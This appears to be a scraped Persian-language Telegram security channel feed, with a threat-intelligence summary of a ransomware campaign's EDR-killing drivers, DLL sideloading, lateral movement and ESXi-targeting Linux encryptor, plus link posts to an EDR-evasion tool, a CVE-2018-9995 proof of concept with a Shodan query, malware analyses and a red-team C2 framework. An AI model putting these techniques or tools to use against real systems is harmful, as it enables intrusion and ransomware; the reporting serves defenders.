باینری لینوکس مورد استفاده نیز بسیار پیشرفته و قابل تنظیم است:
* اجرا با پسورد: برای اجرا حتماً به یک رمز عبور از طریق آرگومان خط فرمان نیاز دارد.
* پارامترهای گسترده: دارای آپشنهای خط فرمان جامع برای حالت دیباگ (
* هدفگیری VMware: پیکربندی باجافزار به طور خاص مسیرهای حیاتی VMware ESXi مانند
* تشخیص OS: واریانتهای قدیمیتر قابلیت تشخیص FreeBSD، VMkernel (ESXi) و توزیعهای استاندارد لینوکس را داشتند.
* هدفگیری جدید (Nutanix): نمونههای جدیدتر، قابلیت تشخیص Nutanix AHV را نیز اضافه کردهاند که نشان میدهد مهاجمان در حال گسترش هدفگیری خود به سمت پلتفرمهای زیرساخت ابر همگرا (Hyperconverged Infrastructure) فراتر از VMware هستند.
@NullError_ir
* مهاجمان از تکنیک پیشرفته BYOVD (Bring Your Own Vulnerable Driver) برای غیرفعال کردن راهحلهای امنیتی استفاده میکنند.
* آنها ابزارهایی مانند
2stX.exe و Or2.exe را مستقر میکنند که از یک درایور آسیبپذیر به نام eskle.sys بهره میبرد.* این درایور که دارای امضای دیجیتال یک شرکت چینی توسعهدهنده بازی ("Thumb World (Beijing) Network Technology Co., Ltd.") است، قابلیتهایی برای خاتمه دادن اجباری به فرآیندها (مانند فرآیندهای AV و EDR) از طریق ایجاد Thread در سطح کرنل دارد.
* علاوه بر این، یک کامپوننت دیگر به نام msimg32.dll شناسایی شد که از طریق تکنیک DLL Sideloading (با استفاده از یک فایل اجرایی قانونی مانند
FoxitPDFReader.exe ) ، دو درایور مخرب دیگر را در مسیر %TEMP% رها میکند:۔
rwdrv.sys۔
hlpdrv.sys* این دو درایور پیش از این در کمپینهای باجافزار Akira برای دستیابی به دسترسی سطح کرنل و خاتمه دادن به EDR ها مشاهده شده بودند.
# ۶. حرکت جانبی و C&C
* برای حرکت جانبی به سیستمهای لینوکسی در محیط، مهاجمان کلاینتهای PuTTY SSH را با نامهای تغییریافته (مانند
test.exe , 1.exe , 2.exe) مستقر میکنند.* برای ارتباطات Command and Control، آنها چندین نمونه از بکدور COROXY (که یک SOCKS proxy DLL است) را در دایرکتوریهای نرمافزارهای قانونی مانند
Veeam ، VMware و Adobe قرار میدهند تا ترافیک مخرب خود را در میان ارتباطات عادی شبکه پنهان کنند.مرحله نهایی: استقرار پیلود کراس-پلتفرم
این بخش، نوآورانهترین بخش حمله است:
1. انتقال فایل: مهاجمان از
WinSCP.exe (ابزار قانونی انتقال فایل) استفاده میکنند تا باینری باجافزار لینوکس (مثلاً mmh_linux_x86-64) را به دسکتاپ سیستم ویندوزی منتقل کنند.2. اجرا: آنها از سرویس مدیریت Splashtop Remote (به طور خاص فایل
SRManager.exe) سوءاستفاده میکنند تا مستقیماً فایل باینری لینوکس (mmh_linux_x86-64) را بر روی خود سیستمعامل ویندوز اجرا کنند.این تکنیک بسیار مؤثر است زیرا اکثر راهحلهای EDR و مکانیسمهای کنترلی ویندوز برای نظارت یا جلوگیری از اجرای یک باینری لینوکسی (که توسط یک ابزار مدیریت از راه دور قانونی فراخوانی شده) پیکربندی نشدهاند.
تحلیل واریانت لینوکس باجافزار
باینری لینوکس مورد استفاده نیز بسیار پیشرفته و قابل تنظیم است:
* اجرا با پسورد: برای اجرا حتماً به یک رمز عبور از طریق آرگومان خط فرمان نیاز دارد.
* پارامترهای گسترده: دارای آپشنهای خط فرمان جامع برای حالت دیباگ (
-d)، سطوح لاگ (-l)، تعیین مسیر (-p) ، پیکربندی لیست سفید و پارامترهای کنترل رمزگذاری است. همچنین شامل تأخیر زمانی (-t) برای اجرای با تأخیر و حالت "yes" (-y) برای عملیات خودکار است.* هدفگیری VMware: پیکربندی باجافزار به طور خاص مسیرهای حیاتی VMware ESXi مانند
/vmfs/ ، /dev/ و /lib64/ را هدف قرار میدهد و در عین حال دایرکتوریهای سیستمی حیاتی را مستثنی میکند.* تشخیص OS: واریانتهای قدیمیتر قابلیت تشخیص FreeBSD، VMkernel (ESXi) و توزیعهای استاندارد لینوکس را داشتند.
* هدفگیری جدید (Nutanix): نمونههای جدیدتر، قابلیت تشخیص Nutanix AHV را نیز اضافه کردهاند که نشان میدهد مهاجمان در حال گسترش هدفگیری خود به سمت پلتفرمهای زیرساخت ابر همگرا (Hyperconverged Infrastructure) فراتر از VMware هستند.
@NullError_ir
❤1
Mr. SAM
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - TwoSevenOneT/EDR-Redir: EDR-Redir : a tool used to redirect the EDR's folder to another location.
EDR-Redir : a tool used to redirect the EDR's folder to another location. - TwoSevenOneT/EDR-Redir
👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
Chuong Dong
LockBit Ransomware v4.0
Malware Analysis Report - LockBit Ransomware v4.0
اکسپلویت نوشته شده با Rust برای آسیبپذیری CVE-2018-9995
شودان 🤔
"GNU rsp/1.0" geo:"xx.xxxx, xx.xxxx, 3"
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - 0xDamian/CVE-2018-9995-rs: POC of CVE-2018-9995 written in Rust.
POC of CVE-2018-9995 written in Rust. Contribute to 0xDamian/CVE-2018-9995-rs development by creating an account on GitHub.
Free Windows software
Detect packer , compiler , protector , .NET obfuscator , PUA application
or
Binary packed data : rar , zip , iso , 7zip , zx , sqz , lz4 , img , ...
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - ExeinfoASL/ASL: Free Windows Detector Software
Free Windows Detector Software. Contribute to ExeinfoASL/ASL development by creating an account on GitHub.
بدافزار RondoDox نسخه دوم :
استفاده از ۷۵ اکسپلویت مجزا که نشان دهنده افزایش چند صد درصدی نسبت به نسخه اول این بدافزار است . تمرکز بدافزار از DVR و روترها ، به برنامههای کاربردی سازمانی گسترش یافته است .
اطلاعات بیشتر ...
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Beelzebub
RondoDox v2: Evolution of RondoDox Botnet with 650% More Exploits | AI deception platform
AI deception platform: Deceive, Detect, Respond. “You can’t defend. You can’t prevent. The only thing you can do is detect and respond.” Bruce Schneier. We turn that hard truth into your tactical advantage. Our AI-based decoys, built using our open-source…
بدافزار SleepyDuck : یک تروجان (RAT) پیشرفته که به طور خاص ابزارهایی مانند Cursor و Windsurf را هدف قرار میدهد و از یک قرارداد هوشمند اتریوم برای ماندگاری و (C&C) خود استفاده میکند.
بخوانید ...
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Secure Annex
SleepyDuck malware invades Cursor through Open VSX
The advanced SleepyDuck IDE extension RAT uses Ethereum contracts for persistence.
❤1
یکی از جذاب ترین خبر برای باری کسانی که #باگبانتی کار میکنند یا علاقه دارند به این موضوع
مجموعهای از ایجنت های هوش مصنوعیبه اسم Strix که مثل یک هکر واقعی عمل میکنن! کد شما رو بهصورت پویا اجرا میکنن، حفرههای امنیتی رو پیدا میکنن، و حتی با نمونهی واقعی (Proof-of-Concept) اونها رو تأیید میکنه!
ادامه ...
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
X (formerly Twitter)
POURYA (@TheRealPourya) on X
یکی از جذاب ترین خبر برای باری کسانی که #باگبانتی کار میکنند یا علاقه دارند به این موضوع
مجموعهای از ایجنت های هوش مصنوعیبه اسم Strix که مثل یک هکر واقعی عمل میکنن! کد شما رو بهصورت پویا اجرا میکنن، حفرههای امنیتی رو پیدا میکنن، و حتی با نمونهی…
مجموعهای از ایجنت های هوش مصنوعیبه اسم Strix که مثل یک هکر واقعی عمل میکنن! کد شما رو بهصورت پویا اجرا میکنن، حفرههای امنیتی رو پیدا میکنن، و حتی با نمونهی…
❤1
A dependency‑free Python3 Command & Control framework for redteam persistence, built to run on systems without installing packages. It comprises a Flask team server, an Electron operator GUI, and a single‑file Python agent that communicates over HTTP/HTTPS using configurable AES‑encrypted JSON messages. Use it to execute commands, manage files, maintain access, and create SSH reverse tunnels from compromised systems
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - boku7/venom: Venom C2 is a dependency‑free Python3 Command & Control framework for redteam persistence
Venom C2 is a dependency‑free Python3 Command & Control framework for redteam persistence - boku7/venom